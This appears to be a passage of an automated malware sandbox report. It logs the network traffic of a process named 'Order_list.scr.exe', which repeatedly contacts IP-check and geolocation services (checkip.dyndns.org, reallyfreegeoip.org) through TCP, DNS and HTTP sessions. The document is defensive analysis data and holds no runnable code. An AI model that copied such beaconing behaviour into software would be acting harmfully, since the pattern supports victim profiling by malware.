                                                                                                                          Jan 13, 2025 10:12:11.208122969 CET4974180192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:11.209289074 CET4974480192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:11.213076115 CET8049741132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:11.213155985 CET4974180192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:11.214180946 CET8049744132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:11.214252949 CET4974480192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:11.214314938 CET4974480192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:11.219049931 CET8049744132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:11.888705015 CET8049744132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:11.889797926 CET49745443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:11.889849901 CET44349745104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:11.889923096 CET49745443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:11.890182972 CET49745443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:11.890196085 CET44349745104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:11.941723108 CET4974480192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:12.365411997 CET44349745104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:12.379086971 CET49745443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:12.379139900 CET44349745104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:12.501655102 CET44349745104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:12.501714945 CET44349745104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:12.504072905 CET49745443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:12.504916906 CET49745443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:12.508702993 CET4974480192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:12.509794950 CET4974680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:12.514672995 CET8049744132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:12.514714003 CET8049746132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:12.514754057 CET4974480192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:12.514796972 CET4974680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:12.514905930 CET4974680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:12.519753933 CET8049746132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.194729090 CET8049746132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.195991039 CET49747443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:13.196088076 CET44349747104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.196173906 CET49747443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:13.196424961 CET49747443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:13.196456909 CET44349747104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.238749027 CET4974680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:13.678220987 CET44349747104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.679919004 CET49747443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:13.679997921 CET44349747104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.814466000 CET44349747104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.814529896 CET44349747104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.814641953 CET49747443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:13.815129042 CET49747443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:13.818316936 CET4974680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:13.819528103 CET4974880192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:13.823467970 CET8049746132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.824341059 CET8049748132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:13.824430943 CET4974680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:13.824470997 CET4974880192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:13.824549913 CET4974880192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:13.829262018 CET8049748132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:14.512423038 CET8049748132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:14.513997078 CET49749443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:14.514053106 CET44349749104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:14.514111996 CET49749443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:14.514394999 CET49749443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:14.514408112 CET44349749104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:14.566782951 CET4974880192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:14.996531963 CET44349749104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:15.015871048 CET49749443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:15.015907049 CET44349749104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:15.127393961 CET44349749104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:15.127454042 CET44349749104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:15.127506971 CET49749443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:15.136281967 CET49749443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:18.303546906 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:18.308557987 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:18.308626890 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:18.308895111 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:18.313741922 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.001573086 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.010643959 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:19.015743971 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.230863094 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.281492949 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.281548023 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.281615973 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.285547972 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:19.286421061 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.286438942 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.760032892 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.760118961 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.761861086 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.761868000 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.762125969 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.816757917 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.876844883 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.923321962 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.985959053 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.986025095 CET44349751104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:19.986064911 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:19.989883900 CET49751443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.059282064 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:20.064148903 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.270972967 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.290370941 CET49754443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.290433884 CET44349754104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.290502071 CET49754443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.290832996 CET49754443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.290848017 CET44349754104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.316790104 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:20.765120029 CET44349754104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.767718077 CET49754443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.767755032 CET44349754104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.906162024 CET44349754104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.906243086 CET44349754104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.906310081 CET49754443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.906867981 CET49754443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:20.911606073 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:20.913397074 CET4975680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:20.918327093 CET8049756132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.918486118 CET4975680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:20.918590069 CET4975680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:20.923434019 CET8049756132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.924690962 CET8049750132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:20.924743891 CET4975080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:21.619364977 CET8049756132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:21.621716022 CET49759443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:21.621741056 CET44349759104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:21.621854067 CET49759443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:21.622076988 CET49759443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:21.622087955 CET44349759104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:21.660531998 CET4975680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:23.030909061 CET44349759104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:23.043423891 CET49759443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:23.043479919 CET44349759104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:23.170120955 CET44349759104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:23.170196056 CET44349759104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:23.170399904 CET49759443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:23.170803070 CET49759443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:23.176407099 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:23.181341887 CET8049760132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:23.181413889 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:23.181508064 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:23.186306000 CET8049760132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:24.707535982 CET8049760132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:24.707962036 CET8049760132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:24.708020926 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:24.708024979 CET8049760132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:24.708065033 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:24.709358931 CET49762443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:24.709410906 CET44349762104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:24.709501028 CET49762443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:24.709773064 CET49762443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:24.709788084 CET44349762104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.168642044 CET44349762104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.177817106 CET49762443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:25.177838087 CET44349762104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.293600082 CET44349762104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.293756962 CET44349762104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.294473886 CET49762443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:25.294475079 CET49762443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:25.298312902 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:25.299420118 CET4976380192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:25.303311110 CET8049760132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.304227114 CET8049763132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.304306030 CET4976080192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:25.304337978 CET4976380192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:25.304470062 CET4976380192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:25.309223890 CET8049763132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.977600098 CET8049763132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.979063988 CET49764443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:25.979130030 CET44349764104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:25.979265928 CET49764443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:25.979613066 CET49764443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:25.979625940 CET44349764104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.019941092 CET4976380192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:26.434468985 CET44349764104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.436443090 CET49764443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:26.436476946 CET44349764104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.694293022 CET44349764104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.694377899 CET44349764104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.694741011 CET49764443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:26.695215940 CET49764443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:26.699423075 CET4976380192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:26.700792074 CET4976580192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:26.704417944 CET8049763132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.704500914 CET4976380192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:26.705852032 CET8049765132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:26.706012964 CET4976580192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:26.706052065 CET4976580192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:26.710813046 CET8049765132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.406127930 CET8049765132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.407641888 CET49766443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:27.407748938 CET44349766104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.407862902 CET49766443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:27.408143997 CET49766443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:27.408169985 CET44349766104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.457490921 CET4976580192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:27.866615057 CET44349766104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.878154039 CET49766443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:27.878201008 CET44349766104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.996128082 CET44349766104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.996270895 CET44349766104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:27.996356010 CET49766443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:27.996820927 CET49766443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:28.001437902 CET4976580192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:28.002659082 CET4976780192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:28.007694960 CET8049765132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:28.007775068 CET4976580192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:28.008763075 CET8049767132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:28.008836031 CET4976780192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:28.008965969 CET4976780192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:28.015077114 CET8049767132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:28.707839012 CET8049767132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:28.709494114 CET49768443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:28.709563971 CET44349768104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:28.709661961 CET49768443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:28.710115910 CET49768443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:28.710129976 CET44349768104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:28.754380941 CET4976780192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:29.185853958 CET44349768104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:29.187499046 CET49768443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:29.187531948 CET44349768104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:29.316744089 CET44349768104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:29.316931963 CET44349768104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:29.317020893 CET49768443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:29.317327023 CET49768443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:29.321003914 CET4976780192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:29.322061062 CET4976980192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:29.326039076 CET8049767132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:29.326105118 CET4976780192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:29.326865911 CET8049769132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:29.326940060 CET4976980192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:29.327056885 CET4976980192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:29.331826925 CET8049769132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.023576975 CET8049769132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.025152922 CET49770443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:30.025222063 CET44349770104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.025330067 CET49770443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:30.025605917 CET49770443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:30.025628090 CET44349770104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.066972017 CET4976980192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:12:30.491704941 CET44349770104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.493824005 CET49770443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:30.493880033 CET44349770104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.638303995 CET44349770104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.638380051 CET44349770104.21.64.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:30.638458967 CET49770443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:30.639147997 CET49770443192.168.2.4104.21.64.1
                                                                                                                          Jan 13, 2025 10:12:34.856240988 CET6140953192.168.2.4162.159.36.2
                                                                                                                          Jan 13, 2025 10:12:34.861143112 CET5361409162.159.36.2192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:34.861229897 CET6140953192.168.2.4162.159.36.2
                                                                                                                          Jan 13, 2025 10:12:34.866139889 CET5361409162.159.36.2192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:35.307612896 CET6140953192.168.2.4162.159.36.2
                                                                                                                          Jan 13, 2025 10:12:35.312755108 CET5361409162.159.36.2192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:35.312861919 CET6140953192.168.2.4162.159.36.2
                                                                                                                          Jan 13, 2025 10:13:12.843734980 CET8049736132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:13:12.843878984 CET4973680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:13:19.510890961 CET8049748132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:13:19.510987997 CET4974880192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:13:26.619700909 CET8049756132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:13:26.620141983 CET4975680192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:13:35.023154974 CET8049769132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:13:35.023335934 CET4976980192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:13:54.520473003 CET4974880192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:13:54.525255919 CET8049748132.226.247.73192.168.2.4
                                                                                                                          Jan 13, 2025 10:14:10.039356947 CET4976980192.168.2.4132.226.247.73
                                                                                                                          Jan 13, 2025 10:14:10.044112921 CET8049769132.226.247.73192.168.2.4
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 13, 2025 10:12:04.610424042 CET5154753192.168.2.41.1.1.1
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET53515471.1.1.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:05.600873947 CET5901353192.168.2.41.1.1.1
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET53590131.1.1.1192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:34.855633020 CET5364138162.159.36.2192.168.2.4
                                                                                                                          Jan 13, 2025 10:12:35.355185032 CET5083953192.168.2.41.1.1.1
                                                                                                                          Jan 13, 2025 10:12:35.377388000 CET53508391.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 13, 2025 10:12:04.610424042 CET192.168.2.41.1.1.10x9ea1Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.600873947 CET192.168.2.41.1.1.10xaf07Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:35.355185032 CET192.168.2.41.1.1.10x25b8Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET1.1.1.1192.168.2.40x9ea1No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET1.1.1.1192.168.2.40x9ea1No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET1.1.1.1192.168.2.40x9ea1No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET1.1.1.1192.168.2.40x9ea1No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET1.1.1.1192.168.2.40x9ea1No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:04.617789030 CET1.1.1.1192.168.2.40x9ea1No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:05.608263969 CET1.1.1.1192.168.2.40xaf07No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                          Jan 13, 2025 10:12:35.377388000 CET1.1.1.1192.168.2.40x25b8Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                          • reallyfreegeoip.org
                                                                                                                          • checkip.dyndns.org
                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449730132.226.247.73803584C:\Users\user\Desktop\Order_list.scr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 13, 2025 10:12:04.640069008 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 13, 2025 10:12:05.341131926 CET273INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 13 Jan 2025 09:12:05 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
